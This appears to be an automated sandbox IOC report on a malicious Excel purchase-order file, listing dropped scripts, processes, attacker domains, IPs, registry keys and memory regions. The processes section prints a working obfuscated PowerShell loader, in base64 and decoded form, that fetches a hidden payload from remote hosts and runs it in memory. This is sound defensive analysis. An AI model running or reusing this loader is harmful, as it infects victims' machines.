IOC Report
Orden de Compra No. 78986756565344657.xlam.xlsx

loading gif

Files

File Path
Type
Category
Malicious
Orden de Compra No. 78986756565344657.xlam.xlsx
Microsoft Excel 2007+
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\wednesdaysMPDW-constraints[1].vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\wednesdaydatinglover.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\~$Orden de Compra No. 78986756565344657.xlam.xlsx
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\bgfgo5mr.ab3.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\fng3ykdr.q3d.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\j4ib2yoe.4gc.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\w4r4vben.wht.ps1
very short file (no magic)
dropped
C:\Users\user\Desktop\~$Orden de Compra No. 78986756565344657.xlam.xls
data
dropped

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaydatinglover.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBTaG9NZVs0XSskUFNob21FWzM0XSsneCcpICggKCgndnpnaW1hZ2VVcmwgPSB3anNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciB3anM7dnpnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt2emdpbWFnZUJ5dGVzID0nKycgdnpnd2ViQ2xpZW50LkRvJysnd25sb2FkJysnRGF0YSh2emcnKydpbWFnZVVybCk7dnpnaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodnpnaW1hZ2VCeXRlcyk7dnpnc3RhcnRGbGFnID0gd2pzPDxCQVNFNjRfU1RBUlQ+Pndqczt2emdlbicrJ2RGbGFnID0gd2pzPDxCQVNFNjRfRU5EPj53anM7dnpnc3RhJysncnRJbicrJ2RleCA9IHZ6Z2ltYWdlVGV4dC5JbmRleE9mKHZ6Z3N0YXJ0RmxhZyk7dicrJ3pnZW5kSW5kZXggJysnPSB2emdpbWFnZVRleHQuSW5kZXhPZih2emdlbmRGJysnbGEnKydnKTt2emdzdGFydEluZGV4IC1nZSAwIC1hbmQgdnpnZW5kSW5kZXggLWd0IHZ6Z3N0YXJ0SW5kZXg7dnpnc3RhcnRJbmRleCArPSAnKyd2emdzdGFydEZsYWcuTGVuZ3RoOycrJ3Z6Z2Jhc2UnKyc2NExlbmd0aCA9IHZ6Z2VuZEluZGV4IC0gdicrJ3pnc3RhcnRJbmRleDt2emdiYXNlNjRDb21tYW5kID0gdnpnaW1hZ2VUZXh0LlN1YnN0cmluZyh2emdzdGEnKydydEluZGV4LCB2emdiYXNlNjRMZW5nJysndGgpO3Z6Z2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKHZ6Z2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSA3TkYgRm9yRWFjaC1PYmplY3QgeyB2emdfIH0pWy0xLi4tKHZ6Z2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07dnpnY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh2emdiYXNlNjRSZXZlcicrJ3NlZCk7dnpnbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHZ6Z2NvbW1hbmRCeXRlcyk7dnpndmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh3anNWQUl3anMpO3Z6Z3ZhaU1ldGhvZC5JbnZva2UodnpnbnVsJysnbCwgQCh3anN0eHQudHNldGFsZGlvcmRzc3Nzc3Nzb3RpdXFlL2dyby5zbmRrY3VkLmVsaWZ5eXl5eXlhZHNlbmRldy8vOnAnKyd0dGh3anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc2Rlc2F0aXZhZG93anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc0FkZEluUHJvY2VzczMyd2pzLCB3anNkZXNhdGl2YWRvd2pzLCB3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGVzYXRpdmFkb3dqcyx3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGUnKydzYXRpdmFkb3dqcyx3anMxd2pzLHdqc2Rlc2F0aXZhZG93anMpKTsnKS1DcmVwbGFjRShbQ2hhUl0xMTgrW0NoYVJdMTIyK1tDaGFSXTEwMyksW0NoYVJdMzYgIC1yZVBsQUNlICAoW0NoYVJdNTUrW0NoYVJdNzgrW0NoYVJdNzApLFtDaGFSXTEyNCAtcmVQbEFDZSd3anMnLFtDaGFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pShoMe[4]+$PShomE[34]+'x') ( (('vzgimageUrl = wjshttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur wjs;vzgwebClient = New-Object System.Net.WebClient;vzgimageBytes ='+' vzgwebClient.Do'+'wnload'+'Data(vzg'+'imageUrl);vzgi'+'mageText = [System.Text.Encoding]::UTF8.GetString(vzgimageBytes);vzgstartFlag = wjs<<BASE64_START>>wjs;vzgen'+'dFlag = wjs<<BASE64_END>>wjs;vzgsta'+'rtIn'+'dex = vzgimageText.IndexOf(vzgstartFlag);v'+'zgendIndex '+'= vzgimageText.IndexOf(vzgendF'+'la'+'g);vzgstartIndex -ge 0 -and vzgendIndex -gt vzgstartIndex;vzgstartIndex += '+'vzgstartFlag.Length;'+'vzgbase'+'64Length = vzgendIndex - v'+'zgstartIndex;vzgbase64Command = vzgimageText.Substring(vzgsta'+'rtIndex, vzgbase64Leng'+'th);vzgbase64Reversed = -join (vzgbase64Command.ToCharArray() 7NF ForEach-Object { vzg_ })[-1..-(vzgbase64Command.Length)];vzgcommandBytes = [System.Convert]::FromBase64String(vzgbase64Rever'+'sed);vzgloadedAssembly = [System.Reflection.Assembly]::Load(vzgcommandBytes);vzgva'+'iMethod = [dnlib.IO.Home].GetMethod(wjsVAIwjs);vzgvaiMethod.Invoke(vzgnul'+'l, @(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wjsdesativadowjs'+', wjsdesativadowjs, wjsdesativadowjs'+', wjsAddInProcess32wjs, wjsdesativadowjs, wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsde'+'sativadowjs,wjs1wjs,wjsdesativadowjs));')-CreplacE([ChaR]118+[ChaR]122+[ChaR]103),[ChaR]36 -rePlACe ([ChaR]55+[ChaR]78+[ChaR]70),[ChaR]124 -rePlACe'wjs',[ChaR]39) )"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious

URLs

Name
IP
Malicious
https://paste.ee/d/nwtkd
188.114.96.3
malicious
http://wednesdayyyyyyfile.duckdns.org/equitosssssssdroidlatest.txt
198.46.178.134
malicious
https://drive.google.com
unknown
malicious
http://wednesdayyyyyyfile.duckdns.org/wednesdaysMPDW-constraints.vbs
198.46.178.134
malicious
http://nuget.org/NuGet.exe
unknown
https://account.dyn.com/
unknown
http://crl.entrust.net/server1.crl0
unknown
https://paste.ee/d/nwtkdE6
unknown
http://ocsp.entrust.net03
unknown
http://wednesdayyyyyyfile.duckdns.org/wednesdaysMPDW-constraints.vbsj
unknown
http://paste.ee/d/nwtk
unknown
https://contoso.com/License
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
https://analytics.paste.ee
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
http://paste.ee/d/nwtkd
unknown
https://www.google.com
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://paste.ee/d/nwtkd(M
unknown
http://wednesdayyyyyyfile.duckdns.org/wednesdaysMPDW-constraints.vbs024C:
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://ip-api.com
unknown
https://analytics.paste.ee;
unknown
https://drive.usercontent.google.com
unknown
https://cdnjs.cloudflare.com
unknown
https://cdnjs.cloudflare.com;
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.comodo.com/CPS0
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
http://crl.entrust.net/2048ca.crl0
unknown
https://github.com/dahall/taskscheduler
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 27 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
wednesdayyyyyyfile.duckdns.org
198.46.178.134
malicious
paste.ee
188.114.96.3
malicious
ip-api.com
208.95.112.1
malicious
drive.google.com
216.58.206.46
drive.usercontent.google.com
142.250.186.97

IPs

IP
Domain
Country
Malicious
208.95.112.1
ip-api.com
United States
malicious
198.46.178.134
wednesdayyyyyyfile.duckdns.org
United States
malicious
188.114.96.3
paste.ee
European Union
malicious
142.250.186.97
drive.usercontent.google.com
United States
216.58.206.46
drive.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
}c/
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
g/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
FileDirectory
There are 35 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
6350000
trusted library section
page read and write
malicious
74EA000
trusted library allocation
page read and write
malicious
402000
remote allocation
page execute and read and write
malicious
4F4C000
stack
page read and write
1D50000
trusted library allocation
page read and write
43ED000
stack
page read and write
A190000
heap
page read and write
1F5000
trusted library allocation
page execute and read and write
26AE000
trusted library allocation
page read and write
2D0000
trusted library allocation
page execute and read and write
1F2000
trusted library allocation
page read and write
4F10000
heap
page read and write
720000
trusted library allocation
page read and write
6FE000
stack
page read and write
277D000
trusted library allocation
page read and write
69E000
stack
page read and write
282000
heap
page read and write
33A9000
trusted library allocation
page read and write
10000
heap
page read and write
465D000
stack
page read and write
4E23000
heap
page read and write
597000
heap
page read and write
B561000
trusted library allocation
page read and write
38D000
stack
page read and write
995D000
heap
page read and write
1C3000
trusted library allocation
page execute and read and write
2416000
trusted library allocation
page read and write
20BE000
stack
page read and write
2330000
heap
page read and write
38F000
heap
page read and write
524000
heap
page read and write
2E0000
heap
page read and write
5FD0000
heap
page read and write
857000
heap
page read and write
4ACE000
stack
page read and write
2430000
trusted library allocation
page read and write
1CDE000
stack
page read and write
76E000
stack
page read and write | page guard
625F000
stack
page read and write
9FAF000
stack
page read and write
1E0E000
stack
page read and write | page guard
4CDE000
stack
page read and write
3381000
trusted library allocation
page read and write
42B0000
trusted library allocation
page read and write
236F000
heap
page read and write
517000
heap
page read and write
1DC0000
trusted library allocation
page read and write
4D8F000
stack
page read and write
4DF000
heap
page read and write
592000
heap
page read and write
5110000
heap
page read and write
5A0000
heap
page read and write
2190000
trusted library allocation
page read and write
290000
trusted library allocation
page read and write
757000
heap
page read and write
6561000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
2BE0000
heap
page read and write
618E000
stack
page read and write
1D70000
trusted library allocation
page read and write
26F6000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
4B0E000
stack
page read and write | page guard
1FD0000
trusted library allocation
page read and write
5FCF000
stack
page read and write
27FA000
trusted library allocation
page read and write
4EE1000
heap
page read and write
1E0F000
stack
page read and write
10000
heap
page read and write
1FE5000
trusted library allocation
page read and write
75E000
heap
page read and write
2521000
trusted library allocation
page read and write
23EE000
stack
page read and write
2000000
trusted library allocation
page execute and read and write
458000
trusted library allocation
page read and write
2394000
heap
page read and write
2250000
heap
page read and write
1CE0000
heap
page read and write
2374000
heap
page read and write
21E0000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
505E000
stack
page read and write
1B0000
trusted library allocation
page read and write
4964000
heap
page read and write
4B0000
heap
page read and write
1E20000
trusted library allocation
page read and write
2354000
heap
page read and write
AF61000
trusted library allocation
page read and write
2916000
trusted library allocation
page read and write
524000
heap
page read and write
5FCE000
stack
page read and write | page guard
2388000
heap
page read and write
4B1F000
stack
page read and write
9D6C000
stack
page read and write
43E1000
trusted library allocation
page read and write
1D86000
heap
page execute and read and write
7EF40000
trusted library allocation
page execute and read and write
621E000
stack
page read and write
240000
trusted library allocation
page read and write
1C9D000
stack
page read and write
597000
heap
page read and write
650000
trusted library allocation
page read and write
504000
heap
page read and write
2A2000
trusted library allocation
page read and write
233B000
heap
page read and write
174000
trusted library allocation
page read and write
576000
heap
page read and write
3501000
trusted library allocation
page read and write
300000
heap
page read and write
9E6C000
stack
page read and write
660000
trusted library allocation
page read and write
2383000
heap
page read and write
529000
heap
page read and write
3E0000
trusted library allocation
page read and write
5080000
heap
page read and write
850000
heap
page read and write
2230000
trusted library allocation
page execute and read and write
790000
heap
page read and write
61C000
heap
page read and write
6B0000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
4DD0000
heap
page read and write
5A5000
heap
page read and write
237F000
stack
page read and write
2399000
heap
page read and write
4F64000
heap
page read and write
A3E0000
trusted library allocation
page read and write
515000
heap
page read and write
596000
heap
page read and write
2310000
heap
page read and write
4EE000
heap
page read and write
42B0000
trusted library allocation
page read and write
2130000
heap
page execute and read and write
4EA0000
heap
page read and write
4D7D000
stack
page read and write
42AE000
stack
page read and write
507000
heap
page read and write
21AE000
stack
page read and write
1F0000
trusted library allocation
page read and write
527000
heap
page read and write
1F30000
trusted library allocation
page read and write
700000
trusted library allocation
page read and write
2110000
trusted library allocation
page read and write
293F000
stack
page read and write
51FE000
stack
page read and write
1F48000
heap
page read and write
9B3F000
stack
page read and write
22D2000
trusted library allocation
page read and write
710000
trusted library allocation
page read and write
630000
trusted library allocation
page execute and read and write
1D80000
direct allocation
page read and write
A14D000
stack
page read and write
62EA000
trusted library allocation
page read and write
536000
heap
page read and write
5F6000
heap
page read and write
544000
heap
page read and write
279C000
trusted library allocation
page read and write
4E0000
trusted library allocation
page read and write
3FD0000
heap
page read and write
17D000
trusted library allocation
page execute and read and write
3510000
heap
page read and write
62F3000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
59C000
heap
page read and write
1D0000
trusted library allocation
page read and write
21DF000
stack
page read and write
14A000
stack
page read and write
524000
heap
page read and write
37B0000
heap
page read and write
780000
trusted library allocation
page read and write
1CC000
stack
page read and write
296000
trusted library allocation
page execute and read and write
A3E0000
trusted library allocation
page read and write
44EF000
stack
page read and write
32DF000
stack
page read and write
A0EF000
stack
page read and write
3C30000
heap
page read and write
76F000
stack
page read and write
3E50000
heap
page read and write
1FDC000
trusted library allocation
page read and write
2C0000
heap
page read and write
26CB000
trusted library allocation
page read and write
504000
heap
page read and write
59A000
heap
page read and write
1D80000
heap
page execute and read and write
4DD000
heap
page read and write
235E000
stack
page read and write
251A000
trusted library allocation
page read and write
4B7E000
stack
page read and write
21F0000
heap
page read and write
A3E0000
heap
page read and write
2B98000
heap
page read and write
542D000
heap
page read and write
1F3E000
stack
page read and write
514E000
stack
page read and write
27BC000
trusted library allocation
page read and write
54BE000
stack
page read and write
300000
heap
page read and write
30F9000
heap
page read and write
9D2E000
stack
page read and write
378000
heap
page read and write
2C0000
trusted library allocation
page read and write
516E000
stack
page read and write
24C0000
heap
page execute and read and write
9940000
heap
page read and write
500000
heap
page read and write
413E000
stack
page read and write
26BE000
trusted library allocation
page read and write
4F0000
trusted library allocation
page read and write
51A000
heap
page read and write
1FE0000
trusted library allocation
page read and write
1F2B000
stack
page read and write
18D000
trusted library allocation
page execute and read and write
62F1000
trusted library allocation
page read and write
2DF0000
heap
page read and write
61E000
heap
page read and write
275000
trusted library allocation
page execute and read and write
2A7000
trusted library allocation
page execute and read and write
26B5000
trusted library allocation
page read and write
222E000
stack
page read and write
3C0000
trusted library allocation
page read and write
5C5000
heap
page read and write
4C7E000
stack
page read and write
2C9000
trusted library allocation
page read and write
4F0000
heap
page read and write
97F000
stack
page read and write
3B90000
heap
page read and write
29A000
trusted library allocation
page execute and read and write
597000
heap
page read and write
46EA000
stack
page read and write
372000
heap
page read and write
4E7000
heap
page read and write
310000
trusted library allocation
page execute and read and write
527000
heap
page read and write
256F000
stack
page read and write
79B000
heap
page read and write
524000
heap
page read and write
3B0C000
heap
page read and write
35B9000
trusted library allocation
page read and write
592000
heap
page read and write
20000
heap
page read and write
180000
trusted library allocation
page read and write
599000
heap
page read and write
9984000
heap
page read and write
292000
trusted library allocation
page read and write
1E10000
trusted library allocation
page read and write
2785000
trusted library allocation
page read and write
137000
stack
page read and write
20000
heap
page read and write
3B0C000
heap
page read and write
4D2E000
stack
page read and write
59C000
heap
page read and write
241C000
trusted library allocation
page read and write
1C4000
trusted library allocation
page read and write
260000
heap
page read and write
453E000
stack
page read and write
7B0000
heap
page read and write
C561000
trusted library allocation
page read and write
3333000
trusted library allocation
page read and write
A370000
trusted library allocation
page read and write
3529000
trusted library allocation
page read and write
3A9000
heap
page read and write
4EF7000
heap
page read and write
A370000
trusted library allocation
page read and write
4CE0000
heap
page read and write
1FF0000
trusted library allocation
page read and write
22E0000
heap
page read and write
3BB000
heap
page read and write
2358000
heap
page read and write
470000
trusted library allocation
page read and write
640000
heap
page read and write
239C000
heap
page read and write
506000
heap
page read and write
A3E0000
trusted library allocation
page read and write
220000
heap
page read and write
9900000
heap
page read and write
9EAF000
stack
page read and write
97BE000
stack
page read and write
6DD000
stack
page read and write
4DCE000
stack
page read and write
A29C000
stack
page read and write
1F0000
trusted library allocation
page read and write
52B000
heap
page read and write
236C000
heap
page read and write
551E000
stack
page read and write
524000
heap
page read and write
35A0000
trusted library allocation
page read and write
7F61000
trusted library allocation
page read and write
5B80000
heap
page read and write
239D000
heap
page read and write
236F000
heap
page read and write
515000
heap
page read and write
59DE000
stack
page read and write
52D000
heap
page read and write
3A90000
heap
page read and write
A3E0000
trusted library allocation
page read and write
160000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
2540000
trusted library allocation
page read and write
2568000
trusted library allocation
page read and write
2495000
trusted library allocation
page read and write
235F000
heap
page read and write
1DA000
trusted library allocation
page read and write
272000
trusted library allocation
page read and write
1D70000
heap
page read and write
2380000
heap
page read and write
170000
trusted library allocation
page read and write
5750000
heap
page read and write
4B5E000
stack
page read and write
3FB9000
trusted library allocation
page read and write
1F60000
trusted library allocation
page execute and read and write
243000
trusted library allocation
page execute and read and write
2D0000
remote allocation
page read and write
465E000
stack
page read and write
494F000
stack
page read and write
4EFB000
heap
page read and write
2383000
heap
page read and write
2DE000
stack
page read and write
366000
heap
page read and write
2389000
heap
page read and write
30F6000
trusted library allocation
page read and write
2456000
trusted library allocation
page read and write
3E8000
heap
page read and write
3E0C000
stack
page read and write
587000
heap
page read and write
20F000
stack
page read and write
3500000
heap
page read and write
6AE000
stack
page read and write
2451000
trusted library allocation
page read and write
5E5000
heap
page read and write
4BFE000
stack
page read and write
4F47000
heap
page read and write
232F000
heap
page read and write
3BE000
heap
page read and write
6302000
trusted library allocation
page read and write
790000
trusted library allocation
page read and write
2438000
trusted library allocation
page read and write
28B8000
trusted library allocation
page read and write
10000
heap
page read and write
9BB0000
heap
page read and write
840000
heap
page read and write
23A2000
heap
page read and write
20000
heap
page read and write
469C000
stack
page read and write
35B2000
trusted library allocation
page read and write
2B9B000
heap
page read and write
270000
trusted library allocation
page read and write
4A0000
trusted library allocation
page read and write
54F000
heap
page read and write
2364000
heap
page read and write
997F000
heap
page read and write
3A91000
heap
page read and write
4F53000
heap
page read and write
232D000
heap
page read and write
2C3000
trusted library allocation
page read and write
289000
stack
page read and write
4BBD000
stack
page read and write
1C6000
stack
page read and write
557E000
stack
page read and write
2CF000
trusted library allocation
page read and write
538E000
stack
page read and write
2AB000
trusted library allocation
page execute and read and write
307000
heap
page read and write
18A000
stack
page read and write
4F34000
heap
page read and write
4DC0000
heap
page read and write
2040000
heap
page execute and read and write
3A5000
heap
page read and write
4B7000
heap
page read and write
2010000
heap
page execute and read and write
3A8F000
stack
page read and write
541E000
stack
page read and write
203D000
stack
page read and write
490000
trusted library allocation
page read and write
2DBE000
stack
page read and write
5A9000
heap
page read and write
5D52000
heap
page read and write
8F61000
trusted library allocation
page read and write
376000
heap
page read and write
596000
heap
page read and write
51A000
heap
page read and write
A3E0000
trusted library allocation
page read and write
98BD000
stack
page read and write
3C56000
heap
page read and write
51BD000
stack
page read and write
5C0000
heap
page read and write
250000
trusted library allocation
page read and write
51A000
heap
page read and write
A6E000
stack
page read and write
237E000
stack
page read and write | page guard
2C7000
trusted library allocation
page read and write
2501000
trusted library allocation
page read and write
3B0C000
heap
page read and write
770000
trusted library allocation
page read and write
36E000
stack
page read and write
54D000
heap
page read and write
234F000
heap
page read and write
4C5E000
stack
page read and write
2D4F000
stack
page read and write
2272000
heap
page read and write
27FC000
trusted library allocation
page read and write
BF61000
trusted library allocation
page read and write
519F000
stack
page read and write
547E000
stack
page read and write
4F82000
heap
page read and write
340000
heap
page read and write
39B000
heap
page read and write
550000
heap
page read and write
2E0000
trusted library allocation
page read and write
5410000
heap
page read and write
7561000
trusted library allocation
page read and write
234C000
heap
page read and write
203F000
stack
page read and write
480000
trusted library allocation
page execute and read and write
3E10000
heap
page read and write
617000
heap
page read and write
996F000
heap
page read and write
173000
trusted library allocation
page execute and read and write
52E000
heap
page read and write
2394000
heap
page read and write
527000
heap
page read and write
3E9000
trusted library allocation
page read and write
3451000
trusted library allocation
page read and write
32F0000
heap
page read and write
505E000
stack
page read and write
54E000
stack
page read and write
7BB000
heap
page read and write
9F61000
trusted library allocation
page read and write
1C0000
trusted library allocation
page read and write
5A9000
heap
page read and write
210C000
stack
page read and write
89000
stack
page read and write
3C38000
heap
page read and write
597000
heap
page read and write
5B91000
heap
page read and write
2EA0000
heap
page read and write
4FEE000
stack
page read and write
3B0000
trusted library allocation
page execute and read and write
4C0000
trusted library allocation
page read and write
4CFD000
heap
page read and write
3FE1000
heap
page read and write
580000
heap
page read and write
320000
trusted library allocation
page read and write
51A000
heap
page read and write
2070000
trusted library allocation
